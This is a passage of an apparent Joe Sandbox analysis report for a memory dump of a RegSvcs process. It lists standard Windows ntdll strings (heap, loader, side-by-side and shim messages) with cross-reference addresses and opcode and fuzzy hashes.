                                                                                              • Opcode Fuzzy Hash: 064db5b40d4c82a5fa2434676b6cf58ab72ae510f3be12e280fe3dd4aceca753
                                                                                              • Instruction Fuzzy Hash: 8351CE715083559BC325EF198848BABBBE8BF94350F54891EE9D8C3285E770D604CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                              • API String ID: 0-1700792311
                                                                                              • Opcode ID: 708f1ccbee8de4aad9b85b0beb17dd9f59e252fd254a6384db67410a0876150b
                                                                                              • Instruction ID: af1a6087ab806920d3c7f514bc8be75f52022f8e08feb3aac4779c46f752e452
                                                                                              • Opcode Fuzzy Hash: 708f1ccbee8de4aad9b85b0beb17dd9f59e252fd254a6384db67410a0876150b
                                                                                              • Instruction Fuzzy Hash: 23D1FE31500681DFDF22DF68C461AAEBBF6FF49710F09808AF9859B656C739D980EB11
                                                                                              Strings
                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01068B8F
                                                                                              • VerifierFlags, xrefs: 01068C50
                                                                                              • HandleTraces, xrefs: 01068C8F
                                                                                              • VerifierDebug, xrefs: 01068CA5
                                                                                              • VerifierDlls, xrefs: 01068CBD
                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01068A67
                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01068A3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                              • API String ID: 0-3223716464
                                                                                              • Opcode ID: 2f0e5e8b11e86fcf1a62d4ff41296b0d7f2bf2c0582cb9cd0da18f81ba5667a5
                                                                                              • Instruction ID: dcbfc3718875175d0e1b7174ca89cca4d8ea71b52d5f4558d9d9b9b89e6a1285
                                                                                              • Opcode Fuzzy Hash: 2f0e5e8b11e86fcf1a62d4ff41296b0d7f2bf2c0582cb9cd0da18f81ba5667a5
                                                                                              • Instruction Fuzzy Hash: 30912572601316AFD721EF68CC81B6A77ECAB55714F04845AFEC06B285C739EC04CBA2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                              • API String ID: 0-1109411897
                                                                                              • Opcode ID: 1c79444e9e896a3aa9d541dc7444d7dc300823d0eb61404293d9e377db793048
                                                                                              • Instruction ID: 8516100dc067a4bfd4941f2ccac110b8127587fc582241de76d06aa2f4d67112
                                                                                              • Opcode Fuzzy Hash: 1c79444e9e896a3aa9d541dc7444d7dc300823d0eb61404293d9e377db793048
                                                                                              • Instruction Fuzzy Hash: 54A259B1E0566A8FDB64DF19CC887ADB7B1AF85310F2442E9D84DA7290DB349E85DF00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-792281065
                                                                                              • Opcode ID: 4a581572086fab8f309449fc2353bd6382cbfb1ec0cbaf752557ea42b2dd901e
                                                                                              • Instruction ID: ee76a8fcc6e160ec284dfcb1790d70a631fc863be91c3959828b7027a2869e7e
                                                                                              • Opcode Fuzzy Hash: 4a581572086fab8f309449fc2353bd6382cbfb1ec0cbaf752557ea42b2dd901e
                                                                                              • Instruction Fuzzy Hash: B1912571A413259BEBB5DF58DC45BEE7BB1BF40B14F000168EDC0AB285EBBA9841C791
                                                                                              Strings
                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01039A2A
                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010399ED
                                                                                              • apphelp.dll, xrefs: 00FD6496
                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01039A01
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01039A11, 01039A3A
                                                                                              • LdrpInitShimEngine, xrefs: 010399F4, 01039A07, 01039A30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-204845295
                                                                                              • Opcode ID: 196538d3f679c92c16466f390f9f2e46397591979c2806422855fba13fc0398b
                                                                                              • Instruction ID: 6bb139f8f7bc58bafebc85dec0dd6179c66836886f8c757ef6e4155ac7ed3efd
                                                                                              • Opcode Fuzzy Hash: 196538d3f679c92c16466f390f9f2e46397591979c2806422855fba13fc0398b
                                                                                              • Instruction Fuzzy Hash: 7051D0712087049FD720DF24D842BAB77E9FB84748F04091EF9C59B2A1DB75E904EB92
                                                                                              Strings
                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01052160, 0105219A, 010521BA
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01052178
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01052180
                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0105219F
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010521BF
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01052165
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                              • API String ID: 0-861424205
                                                                                              • Opcode ID: d966f8dbda51eb3b7b8b97171c59f06b9aafabb187aea37f407f515941a6831e
                                                                                              • Instruction ID: e5059b6af99775cc4387d034facc4672cf34f4de0458e23c91a7f5c041a99577
                                                                                              • Opcode Fuzzy Hash: d966f8dbda51eb3b7b8b97171c59f06b9aafabb187aea37f407f515941a6831e
                                                                                              • Instruction Fuzzy Hash: 0831F836F40316B7E7219A9A9C45F9F7BB8EF64B50F150059BB44BB184D270DE00DBA1
                                                                                              Strings
                                                                                              • LdrpInitializeProcess, xrefs: 0101C6C4
                                                                                              • LdrpInitializeImportRedirection, xrefs: 01058177, 010581EB
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01058181, 010581F5
                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01058170
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0101C6C3
                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 010581E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-475462383
                                                                                              • Opcode ID: 06406335510e3e75d94fbd739aaba93b8575564464e745660aa9bcac5b2fa2c0
                                                                                              • Instruction ID: 859cccd048c20d9ceb0b1b84cc651c066835c557778f60b7fd683d85d86ff64e
                                                                                              • Opcode Fuzzy Hash: 06406335510e3e75d94fbd739aaba93b8575564464e745660aa9bcac5b2fa2c0
                                                                                              • Instruction Fuzzy Hash: E131F1B17443069BD320EB68D946E6B7BE4AF94B10F044958FDC5AB2D1E624ED04CBA2
                                                                                              APIs
                                                                                                • Part of subcall function 01022DF0: LdrInitializeThunk.NTDLL ref: 01022DFA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020BA3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020BB6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020D60
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020D74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 1404860816-0
                                                                                              • Opcode ID: 64ba11d630762fabcff5df1cd761153bfb47917bd0ae804dac4022c4c371212a
                                                                                              • Instruction ID: fb67573b6f1493f58407f54f306906f12a373c446aaa005109ddd5d525cd67ac
                                                                                              • Opcode Fuzzy Hash: 64ba11d630762fabcff5df1cd761153bfb47917bd0ae804dac4022c4c371212a
                                                                                              • Instruction Fuzzy Hash: B8426B75900715DFDB61CF68C880BAAB7F5FF04314F1485AAE989EB245E770AA84CF60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                              • API String ID: 0-379654539
                                                                                              • Opcode ID: f87f527403b4519afa335b1dc4bcd5b172cf8562ae8d6e922e3340e64b7e7d76
                                                                                              • Instruction ID: eb7026cf2f53ceec7f22b9193aecc8692f6cc8ca6c726475333ec73e9e5f31bb
                                                                                              • Opcode Fuzzy Hash: f87f527403b4519afa335b1dc4bcd5b172cf8562ae8d6e922e3340e64b7e7d76
                                                                                              • Instruction Fuzzy Hash: 44C1BE71608386CFC711DF5AC480B6AB7E4FF84704F04886AF8958B2A1E774EA45EB57
                                                                                              Strings
                                                                                              • @, xrefs: 01018591
                                                                                              • LdrpInitializeProcess, xrefs: 01018422
                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0101855E
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01018421
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1918872054
                                                                                              • Opcode ID: 41adf30e3724699fdc72123756fa011d21c5f84c96916614af16823d074cf8b7
                                                                                              • Instruction ID: 1887b66de69891b20e704a08b47708c240e4bfa6c334db6a365b44386b97268c
                                                                                              • Opcode Fuzzy Hash: 41adf30e3724699fdc72123756fa011d21c5f84c96916614af16823d074cf8b7
                                                                                              • Instruction Fuzzy Hash: FD91B971548345AFD722DF65CC40EABBAECFF88784F40492EFAC492155E738DA049B62
                                                                                              Strings
                                                                                              • .Local, xrefs: 010128D8
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010522B6
                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010521D9, 010522B1
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 010521DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                              • API String ID: 0-1239276146
                                                                                              • Opcode ID: 871e8e324c0b2a3aae34b97cc4c192816be9ce98f8063b828a6fdcb7217b14ca
                                                                                              • Instruction ID: f2554680526414a51f3fbf7dabd1852f47efa6a3857914ae23a6044974ef9094
                                                                                              • Opcode Fuzzy Hash: 871e8e324c0b2a3aae34b97cc4c192816be9ce98f8063b828a6fdcb7217b14ca
                                                                                              • Instruction Fuzzy Hash: 8AA1E13590022ADFDB64CF68DC84BAAB7B1BF58354F2541E9D988A7255D7349EC0CF80
                                                                                              Strings
                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01053437
                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0105342A
                                                                                              • RtlDeactivateActivationContext, xrefs: 01053425, 01053432, 01053451
                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01053456
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                              • API String ID: 0-1245972979
                                                                                              • Opcode ID: 3c9c145fc5c86bf1fda487ce92ef61269225e5f149dab81b02ce22ea743ee635
                                                                                              • Instruction ID: b7366ce1998b7c35db3708812effb88e91a29754599bd23267280e04e3d99728
                                                                                              • Opcode Fuzzy Hash: 3c9c145fc5c86bf1fda487ce92ef61269225e5f149dab81b02ce22ea743ee635
                                                                                              • Instruction Fuzzy Hash: D5611532600B129BD7A28F1CC882B2BBBE4BF80B50F158599E8D5DF251CB74F841CB91
                                                                                              Strings
                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0104106B
                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01040FE5
                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010410AE
                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01041028
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                              • API String ID: 0-1468400865
                                                                                              • Opcode ID: 0ffee3ba6b483a5744e3660707aa705bc83d1c9563db366991762c8c63213ee0
                                                                                              • Instruction ID: fca1bbd119960d23f8fe2dc45face9d89222a3f0a89ceae7f0dc7b9fb795cf78
                                                                                              • Opcode Fuzzy Hash: 0ffee3ba6b483a5744e3660707aa705bc83d1c9563db366991762c8c63213ee0
                                                                                              • Instruction Fuzzy Hash: 2D71F4B1A043599FCB20DF15C884F977FA8AFA47A4F140469F9888B286D734D588DFD2
                                                                                              Strings
                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105362F
                                                                                              • LdrpFindDllActivationContext, xrefs: 01053636, 01053662
                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01053640, 0105366C
                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0105365C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                              • API String ID: 0-3779518884
                                                                                              • Opcode ID: 9f69763ff4e836dd50fb2c9a2c50329b4572595edecbdfc0e7ff20c6ba3de9ca
                                                                                              • Instruction ID: 55cb5e6b8b93d2967e9201e00e74a64aa145289c114f8021b7724cee14a12ddd
                                                                                              • Opcode Fuzzy Hash: 9f69763ff4e836dd50fb2c9a2c50329b4572595edecbdfc0e7ff20c6ba3de9ca
                                                                                              • Instruction Fuzzy Hash: 45315031900211AADF71BB0CD849F6676F4BB01758F8640A9EDC8DB179D76CDD808792
                                                                                              Strings
                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0104A992
                                                                                              • LdrpDynamicShimModule, xrefs: 0104A998
                                                                                              • apphelp.dll, xrefs: 01002462
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0104A9A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-176724104
                                                                                              • Opcode ID: ac9b0a8e7ae0a92950beaef21f6a339a9d5c69a0f4bc35a1308d065a484e0020
                                                                                              • Instruction ID: 3137841bbf505d620db823d3e40b739008603a346149c6d2cc4b75efa10010e2
                                                                                              • Opcode Fuzzy Hash: ac9b0a8e7ae0a92950beaef21f6a339a9d5c69a0f4bc35a1308d065a484e0020
                                                                                              • Instruction Fuzzy Hash: 513148B5740301EBEB319F59D886A6EB7F4FB84704F160069FD816B245CB759981C740
                                                                                              Strings
                                                                                              • HEAP[%wZ]: , xrefs: 00FF3255
                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FF327D
                                                                                              • HEAP: , xrefs: 00FF3264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                              • API String ID: 0-617086771
                                                                                              • Opcode ID: 4d919b26a4520d498302520ec481daf06d5c58459895dd8186bc33eb68fab561
                                                                                              • Instruction ID: baf250fd84d7526d97d365822106fd1da9019bc2a47263bd774d0557e49fd096
                                                                                              • Opcode Fuzzy Hash: 4d919b26a4520d498302520ec481daf06d5c58459895dd8186bc33eb68fab561
                                                                                              • Instruction Fuzzy Hash: 8F92AB71E042499FDB25CF68C440BBDBBF1BF48310F188099E995AB3A1D739AA45EF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-4253913091
                                                                                              • Opcode ID: 297180f3c0c4af5206a8fc0ac7bc3da996ab7a5a0045a14141c9e3ae9dd16089
                                                                                              • Instruction ID: 15cdab9b3102c78a3a2c73ecf3df9ec89bb864021fa7671ebc337e72e2b3804e
                                                                                              • Opcode Fuzzy Hash: 297180f3c0c4af5206a8fc0ac7bc3da996ab7a5a0045a14141c9e3ae9dd16089
                                                                                              • Instruction Fuzzy Hash: 77F1C071A0060ADFDB25CF68C890B7AB7F5FF45300F1481A9E6469B3A2DB74E941DB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $@
                                                                                              • API String ID: 0-1077428164
                                                                                              • Opcode ID: 16ff902ba6bda07b4e519a29364312eeeef4accb14efc005e16e7dc5628d3cf8
                                                                                              • Instruction ID: 0beff594754e7adda69555e5ff4da0fd6c87779bc485b639f6fd7b6d12a7a4b8
                                                                                              • Opcode Fuzzy Hash: 16ff902ba6bda07b4e519a29364312eeeef4accb14efc005e16e7dc5628d3cf8
                                                                                              • Instruction Fuzzy Hash: 6FC280716093419FE766CF28C881BABBBE5BF88754F04896DF9C987281D735E804CB52
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                              • API String ID: 0-2779062949
                                                                                              • Opcode ID: e258c87f774eada631d8e591ae2a2bd2491bf093ef08226714fea0a14d166e20
                                                                                              • Instruction ID: d013d62b19aa7e60e6060b32c59ef694d4f694ed88f5489758aade749676ab04
                                                                                              • Opcode Fuzzy Hash: e258c87f774eada631d8e591ae2a2bd2491bf093ef08226714fea0a14d166e20
                                                                                              • Instruction Fuzzy Hash: E0A17C759012299BEB31DF68CD88BEAB7B8EF44710F1041EAE949E7250DB359E84CF50
                                                                                              Strings
                                                                                              • LdrpCheckModule, xrefs: 0104A117
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0104A121
                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0104A10F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-161242083
                                                                                              • Opcode ID: 982ed21bcb70afba92804fad1e3b3ff5d9ca6d618ae3091858de5518a4bbfe93
                                                                                              • Instruction ID: a10f91bc9c9906df565f510c506be2c1abeea2e721e4e6ba0444b7eb317d0193
                                                                                              • Opcode Fuzzy Hash: 982ed21bcb70afba92804fad1e3b3ff5d9ca6d618ae3091858de5518a4bbfe93
                                                                                              • Instruction Fuzzy Hash: 9771C0B0A00209DFEB26DF68C981BAEB7F4FF44344F14406DE98697255E739A941CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-1334570610
                                                                                              • Opcode ID: f73e05bd05c2634dde0ed990684d50b7519dc4e66a72e8d47d180f5d86aea463
                                                                                              • Instruction ID: e131aead5759678f03046da70d214a8ddcac1abe12f0c27eab5d221979c29380
                                                                                              • Opcode Fuzzy Hash: f73e05bd05c2634dde0ed990684d50b7519dc4e66a72e8d47d180f5d86aea463
                                                                                              • Instruction Fuzzy Hash: 9261B171600305DFDB29CF28C880B7ABBE1FF45704F1485AAE695CB2A6DB74E841DB91
                                                                                              Strings
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FDCD34
                                                                                              • InstallLanguageFallback, xrefs: 00FDCD7F
                                                                                              • @, xrefs: 00FDCD63
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                              • API String ID: 0-1757540487
                                                                                              • Opcode ID: 6aee709ba1e763855c9682cb4707003164a76dd68f489048201d4e29dcfecbdb
                                                                                              • Instruction ID: ab328ec4dd7b7b2c9a04e94febd69bae9ed3a86436b2fe03a31464061c693b48
                                                                                              • Opcode Fuzzy Hash: 6aee709ba1e763855c9682cb4707003164a76dd68f489048201d4e29dcfecbdb
                                                                                              • Instruction Fuzzy Hash: F651CC76604356DBC711DF68C844AAAB7E9AFC8714F04096EFAC4D7240EB34DA05DBA2
                                                                                              Strings
                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 010582DE
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 010582E8
                                                                                              • Failed to reallocate the system dirs string !, xrefs: 010582D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
